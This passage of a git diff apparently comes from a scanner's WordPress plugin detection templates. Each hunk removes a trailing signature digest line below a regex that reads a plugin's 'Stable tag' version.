490a0046304402207eca6d022ef5924408f25693d9a41a5cd1eb2c3c0f969946917e9010cd079c810220128eda6ef8d24b42edc7dbaaba9a06b6a5d99f5a67e19331575f016a6d1dbf96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 47c99098f5..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eba9fa48439cde753b9b8434410c711ae2b0e598820526da80dfbd125c448af40221008c162b3ca90fbfc338480335b85cf7a9eac6f1320008fcfe54468247bcf2f787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 2cf699f80d..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205eba8c3e107768cdc7fa18ca55003463141c1f9a13f2248fe71e088a92b63ae2022100afcf5deac793e8610beee622766028c55077d662cfd21505efb359c157f121c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 887effab6f..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100972c1969041261f52567d285bd196c95947f45ee8efe803f258149bb94afed7102203422fe3db461058705d03c9455d471c7a8f9519385cf20c359b51513482123dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 8e0bdd5d50..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200654fd7ee2ca4a79649e7039531c2a09dbb7522ca8916c465c7f86e0b186211c022100b2ef395cae27d399528ccb5c032c19a32dd9adc391a8332284ea60b0a8f479b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 725b8e372a..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8e778c2eb2425ed49afe8977838b5fc7b54bcb3675ec6e21fd224627596da80022100cbf47263f93cae3ec2be6a7c8da8c217bfc32aaf6cdd2a97b7e6a81f7952b2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index a0dace64ce..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200452431bb4c07417de74b300965b8ab4c77ad140eae90f9183551bc076dda848022100d5942fae9bb8fcea73a8f37399469469114a1f93008f32add08f48073c892395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 7006a4b5ea..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200826ecec0ea9ae123df74a2e222f7d01f65363967f54b836b6f30b66fbc7b6b8022100b19ed29690e3b23887e652b8a46ea6f402e52cac798afc3987cf4d3db71433f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2c3eb4ea55..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220678f05cee487f6fa4a056428cdb30d19a29b4a156fbf01bee27a702ad379aa3302203a3b0573b50b8cb6d13ae5bb55611cf10f51aae824813a34ddbfa487c9fc0685:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 61616ea0fe..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206622d13663e7a1abe06988b388dd34eceaa162c67767c6c57a3fd2bf9c96330d022100e307fd1406b041ff219ffb9818a52605a1dc510d86c8d29b6e7d4c9256aed9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index ba19bbdb9c..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b5dfbe890a986ff97b5a7fcfd2681e6f4caccdc450228ccc5cf4a465ee61d9302207aa9baa508b9403f48fe2ad89d4ebb9c2112ff148083bed327f9e3424f3e799b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 7f13554588..c1a44066bb 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ded46ea4f2f2fa11fcbe77b5312e4a675dfe104fb3bcc4f517fc70321cb16b3c0220406bdde7bc857ae9512fab1aee2a25c742ed9439c2e14b97c348bcd603f1bca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3a9eb3371e..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203812d74cb0ee4e1e197b374f6a563bbcfd390a3df38825dabc6d3bc7a78b0b96022100ec27af5a35cb7eb90b9f4a9252e4896192d6ca83df9521edec4324215112eb34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index bc7e32092d..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f23daccaee2ddddab301428fd304de1a4aff89ab74daeda0c882bda8c54479e5022070dd2ed2ce1e5543380c3b2bbc8ab0d6dae4832635f55438615df7dfa8c19d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 8104eae7e7..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a86bfe04eb113dc833251cd3153aaa308ddf4fcf37ae6332b4ce152ca513cd400221009c2e1b06334f9af2847d71f052f38f1927a2546a569fd08110223110354a64c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index f2a4f060a9..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046abc7b1c6e7c3a414ec85a8dde999c20a554bc31ce7916cefdb4436bcf8ea0302203856b76ccfe9f93d993ce33829d6cffb8e41a4b0849454e68a64eccd4ae440ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 9dff68a7dc..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207dc30aed51554fdc0148cbf213408f4963467d2e7751a3aac7e3aa67025b2402022100b614ddec6da099fab62c3c9e89fe4d6a84f777749ee62aac1dffc03910113474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4da9e8cbc5..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220251b877d27a9f99cc86c3016487e24d26e0daaffd319d270058ce7262d867a0e022006393d004300b574691cec2261161c379d04c568384af347c160c3555093089d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index c9c2e18778..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085227814d6d065a11faef8f6ed5effcf8833fca80a562926a9be8952b9160772022079ca595ebdc4ca8712a5b7b99f68badf838a0a446eb1c6c0dea1096fc1b8df30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 78611170ed..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c43681d26d1aaa62728b091cd72719042b400a40373387153e146bd9c9f77144022100ec23796b705db1163802e0ae80e31ea03a5acfc9c6315a98ec58b343dc115051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 95d1ee9b00..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd48663189d4abfd43bf98a5d7f844f75f8fc8860dfe0c7e0e982b4a214a802c022005eb2a01ed914e7f1863a62f2f5a084017c4157b9237a9308b64e87687bd0a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index ee69105e8c..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9da9a1d3b617e0e1d7da46133d7cd2fb2b99b443af111d350354abaad91b102022100904395745601c4121506451e4929dc6dce2f4b299a60e43c1e3093abcc0141a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index ab557bce85..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b32d96573d8e2df3d1f9a6dcaec0c1436d189a488ac1a65fa42ef55eaa1184ee0220108fbb96fe5f42172e4fad337ad48d84d83b0c74394d23d34eab08daed1b6ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 7ca9d6ea00..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5c9ff0834449ed03bce0799b198676eb8b21c48da914377b060b6d188250bbc02205acf9be7d94fd9befcb88065b95860078a6125ed2489ec6bf6139f46aa180980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 45484d263f..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4d46f4f79c582d54c5480cef927ba12ec8de9901a0497758dad6c417fd9d09a02210080763e9ccee1986c595bf7f65afc73c9956b59c00e67c06b99c585dc15957336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 317f84cb32..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a38968aa739ad80379be25d8fb1ea2feb6d196bafd52e4681497a04ab7b8569022060503b22c0d336b14fa5e3bf206222afee13ec5c6b67f57ec820e8e45654bc01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index fb4bd7743b..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fce3d8dbd541a75202d05c615129c220a0148cd3140e8a2b474e108668074811022100e3738f998a827e75edfa1475846187bb9e7729459c6d27176ecfdfad8cb08b3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 2a1d0158eb..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206699c8ea937c8456dec8d075145477d457b338a8ad6c27e8bfec00141f56011a02210085d6fa7ede14ddee5682d3302b55239b76a2c37136cbd308077020d343418df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 8982f15282..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028668485bc1595ae09d1d248a6eac7121d62e8afdb1593da46afe758a1ec253a022100f0ecc94328bdc4c8257a17694540a824ced7f6fbe556b8f12b03502fbbfe44e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 19338035d0..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4592fb9feaae462f7ec5e1da0bc2c202ae1a0718e223bef25da5b689903b363022100db832829942b088e2e563bf7c46d1a1ce7a45648da4e57784e4d2cd8a1c96da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 6e77799565..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071ee9468cc4762dc44d05e154855cba3f6ba50195da039b949c05d74e50b0749022002cba97eeeb9dbae4d96640f40e011ce751bb752ccaf969bd7a4d17a7eb372aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 482a3b398b..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ef3cc600eb522cc409a9d51327be5ae3f4bcb57b5f7253aa971329403496a1a02202faf3a3d5c22923cf2149ebef1062c98b9501bf176e9b6c8ede3cc0038b0ad50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index e874de85b2..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b2e6d966e3456e9a7bd9c14288128d73d35bff3389f8b4f9ec73b200a4fedb7022065294592c1fbdadcfffaffc6dc55c4e53e7942a7e72e7ac5c00d8831e0c262b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 64177f1e27..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6406dbb2249166f8c9b95108efe61a01eb1a1dc738df4b360ee68023d90e2290220579d279db12dcbe63fc4077f5aae347498298acfd96eff17b98bedf47dfc2933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 13432f3ee7..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201215829bc1ef7b3681df3bd0921addebe361ccef24ff3184c8217f0c74465f1e02203ed0f18db241b267fd52bb27bff52100f126859a75de24115492965af01f6c5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 8b0758ea98..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220088f1028002e84c9f3d9e9045935b71ff48b7c9158441e4516fb57ec760068c40220438165ecc651c94a9012ddbedd8a840f25c8296926e322a6b60d4cd765ba7b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 2281b1b98c..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053fd82222179cb1081c00d0fa939a29bd1ce0e53bb4cac3923508823121da30f02210084b7bd17b0000de21b662453dfc6ca3b9d05209732244927d5b5489bb69063d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 7b1b1ed4c8..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017e8d9f253e23940e1960078ee3f36bf74379c731c94c7c7184e502828ffc77c022100f6acc8fc3ec53ec1be58e0bce7d4a96f5e1d7dd42f52adbf854d6418516a5d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9e6ad88b6..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220773aa9cb1c7184524cebc26fd56a35d8cc4dff71cbfefe6a4a17cd24eee6421802201a8d7b57ccdfd9ff75b061b43482492a9b858aa93a60f6cb064a546903e85cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index c4bc1d00c0..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb9e325a4e888188b1dc4307d84fd8fbba9719aaf9b302217575dab5650ef380022100c0f53ced53d0e921e281343625a444c275b3c9f63c47b5b0019f074857a620d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 3d8e7df5c5..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ffb9e4d1bc958ea908bb81cbed4e94e55d9290a02ca09d7fc96f974a1220b6b022100e78b56f5d481836d78dd241061b5f928e513e3308fa9e9346194326264b6428e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index b138f59877..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202242a45203097a27e005944caf1ff72fad190dec0ab8a1d1cc32cb41fc20252c0221009951e788e620598241133fce79646887ec65ffc4376317d343d7f17d90a227c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index db0fb6515c..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033992357dbe7b14755312e9fe103dad834573582ff9be5c5d0f641a3f104fc1e022100c35bf2b73ab0ec205620aa6e0cf8d763b90b47f4b914100ccd5487d529bf6451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 401decc811..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031078f9f6694947be02130359fea4cd1c4b7ca6b9e090137a73e263c834298ae0220153dd3d319455d6bb2e62f4910bd82462ed9ca997f876f233b21b27b6ad7baff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 6ce0642ba7..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f4126e3e65fe2d2602dddd0374698c68b2d3af820f867f1c785451cb4dcf6c40220098d65cc0770d48adec612c07fdcd61ae24f3ec79e5908f779e38d1274d1d61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 270a106daf..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fea1feb02ac250218e0e29b5b31adcd35ab22ddd58935b578eb40c9455a2eac022100eb2094acd8575223e2844cfb5637336905ccece49fb756dd196800ccc88fb53a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index b94231cf64..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201dda74920be0e8f3248e940796dd286c742f1a731d89ec806f9bbcb543715773022100d3d2a160943c75903dfd3ff3a7a76e83bb0a080630edd3bbda74d7ab805b29de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index f03cf91a8b..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3b908ac9ecf46e437f295ddc475eec8dc767fdc01d192738a87fc75a9e4ab56022100bef7c7c0db0d3e375f0eded04b1e21bd5e3462637209f312df9ab88f98bd842d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 4b5077b8dd..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 